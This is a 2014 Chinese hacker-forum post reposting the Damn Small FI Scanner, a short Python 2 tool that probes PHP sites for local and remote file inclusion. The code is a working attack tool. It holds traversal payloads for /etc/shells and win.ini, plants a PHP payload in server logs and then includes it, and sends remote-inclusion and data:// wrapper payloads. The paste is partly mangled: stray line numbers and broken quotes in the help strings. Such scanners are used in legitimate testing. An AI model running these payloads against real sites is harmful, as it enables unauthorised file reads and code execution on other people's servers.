搜索
查看: 231|回复: 0

【100行Python代码扫描器】 LFI/RFI vulnerability scanner (DSFS)

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2014-12-2 21:12:03 | 显示全部楼层 |阅读模式
#!/usr/bin/env python
"""Damn Small FI Scanner (DSFS): a sub-100-LoC local/remote file inclusion
(LFI/RFI) vulnerability scanner for PHP targets.

Python 2 only (print statements, urllib2, str.encode("base64")).
"""
import itertools, optparse, random, re, urllib, urllib2

NAME    = "Damn Small FI Scanner (DSFS) < 100 LoC (Lines of Code)"
VERSION = "0.1c"
AUTHOR  = "Miroslav Stampar (@stamparm)"
LICENSE = "Public domain (FREE)"

DYNAMIC_CONTENT_VALUE = "Legal disclaimer:"                                                                 # string value to search if the content is dynamically evaluated
DYNAMIC_CONTENT = "<?php echo base64_decode('%s');?>" % DYNAMIC_CONTENT_VALUE.encode("base64").strip()      # used dynamic content (PHP payload that, if executed, prints the marker above)
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"                                                     # optional HTTP header names
GET, POST = "GET", "POST"                                                                                   # enumerator-like values used for marking current phase
TIMEOUT = 30                                                                                                # connection timeout in seconds

ERROR_REGEX = r"(?i)(Fatal error|Warning)(</b>)?:\s+((require|include)(_once)?|file_get_contents)\(\)"      # regular expression used for detection of vulnerability specific PHP error messages

FI_TESTS = (                                                                                                # each (test) item consists of ("filepath", "content recognition regex", (combining "prefixes"), (combining "suffixes"), 'inclusion type')
    # 'L' = local file inclusion, 'R' = remote file inclusion, 'S' = stream wrapper (data://) inclusion
    ("", r"\[[^\]]+\]\s+\[(warn|notice|error)\]\s+\[client", ("/xampp/apache/logs/", "/apache/logs/", "/wamp/apache2/logs/", "/wamp/logs/", "/program files/wamp/apache2/logs/", "/program files/apache group/apache/logs/", "/var/log/apache/", "/var/log/apache2/", "/var/log/httpd/", "/var/log/nginx/", "/opt/lampp/logs/", "/opt/xampp/logs/"), ("error.log", "error.log%00"), 'L'),
    ("https://raw.githubusercontent.com/stamparm/DSFS/master/files/", "Usage of Damn Small FI Scanner", ("",), ("", "%00", "config", "config.php", "config.php%00", "config.jpg", "config.jpg%00"), 'R'),
    ("/etc/shells", "valid login shells", ("../../../../../../..", ""), ("", "%00"), 'L'),
    ("/windows/win.ini", "for 16-bit app support", ("../../../../../../..", ""), ("", "%00"), 'L'),
    ("data://text/plain;base64,%s" % DYNAMIC_CONTENT.encode("base64").strip(), ("<?php echo base64_decode\(|%s" % DYNAMIC_CONTENT_VALUE), ("", ), ("", ), 'S'),
)

USER_AGENTS = (                                                                                             # items used for picking random HTTP User-Agent header value
    "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21",
    "Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.2) Gecko/20020508 Netscape6/6.1",
    "Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5",
    "Opera/9.80 (X11; U; Linux i686; en-US; rv:1.9.2.3) Presto/2.2.15 Version/10.10"
)

_headers = {}                                                                                               # used for storing dictionary with optional header values

  28. def _retrieve_content(url, data=None, method=None):
  29.     try:
  30.         req = urllib2.Request("".join(url[i].replace(' ', "%20") if i > url.find('?') else url[i] for i in xrange(len(url))), data, _headers)
  31.         req.get_method = lambda: method or (POST if data else GET)
  32.         retval = urllib2.urlopen(req, timeout=TIMEOUT).read()
  33.     except Exception, ex:
  34.         retval = ex.read() if hasattr(ex, "read") else getattr(ex, "msg", str())
  35.     return retval or ""

def scan_page(url, data=None):
    """Scan every GET (query-string) and POST (*data*) parameter of *url*
    for file-inclusion vulnerabilities, printing findings as it goes.

    Returns True if at least one parameter appeared vulnerable.
    """
    retval, usable = False, False
    _retrieve_content(url, method=DYNAMIC_CONTENT)                                                          # dummy erroneous request (the PHP payload is sent as a bogus HTTP method) — presumably to plant the payload in the server's logs for the log-inclusion test; TODO confirm intent
    try:
        for phase in (GET, POST):
            current = url if phase is GET else (data or "")
            # parameters are name=value pairs at the start of the string or after '?'/'&'
            for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)(?P<value>[^&]*)", current):
                warned, found, usable = False, False, True
                print "* scanning %s parameter '%s'" % (phase, match.group("parameter"))
                for filepath, regex, prefixes, suffixes, inc_type in FI_TESTS:
                    for prefix, suffix in itertools.product(prefixes, suffixes):
                        # replace the parameter's value with the prefix+filepath+suffix payload
                        tampered = current.replace(match.group(0), "%s%s" % (match.group(1), urllib.quote("%s%s%s" % (prefix, filepath, suffix), safe='%')))
                        content = (_retrieve_content(tampered, data) if phase is GET else _retrieve_content(url, tampered))
                        if re.search(regex, content):
                            print " (i) %s parameter '%s' appears to be (%s)FI vulnerable (e.g.: '%s')" % (phase, match.group("parameter"), inc_type, tampered)
                            if DYNAMIC_CONTENT_VALUE in content:
                                print "  (!) content seems to be dynamically evaluated"
                            found = retval = True
                            break                                                                           # NOTE: exits only the prefix/suffix loop; remaining FI_TESTS are still tried
                        if not found and not warned and re.search(ERROR_REGEX, content, re.I):
                            # inclusion-specific PHP error seen but content not recognized: warn once per parameter
                            print " (i) %s parameter '%s' could be FI vulnerable" % (phase, match.group("parameter"))
                            warned = True
        if not usable:
            print " (x) no usable GET/POST parameters found"
    except KeyboardInterrupt:
        print "\r (x) Ctrl-C pressed"
    return retval

  63. def init_options(proxy=None, cookie=None, ua=None, referer=None):
  64.     global _headers
  65.     _headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer))))
  66.     urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({'http': proxy})) if proxy else None)

  67. if __name__ == "__main__":
  68.     print "%s #v%s\n by: %s\n" % (NAME, VERSION, AUTHOR)
  69.     parser = optparse.OptionParser(version=VERSION)
  70.     parser.add_option("-u", "--url", dest="url", help="Target URL (e.g. "http://www.target.com/page.php?id=1")")
  71.     parser.add_option("--data", dest="data", help="POST data (e.g. "query=test")")
  72.     parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
  73.     parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value")
  74.     parser.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value")
  75.     parser.add_option("--referer", dest="referer", help="HTTP Referer header value")
  76.     parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. "http://127.0.0.1:8080")")
  77.     options, _ = parser.parse_args()
  78.     if options.url:
  79.         init_options(options.proxy, options.cookie, options.ua if not options.randomAgent else random.choice(USER_AGENTS), options.referer)
  80.         result = scan_page(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data)
  81.         print "\nscan results: %s vulnerabilities found" % ("possible" if result else "no")
  82.     else:
  83.         parser.print_help()
复制代码
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表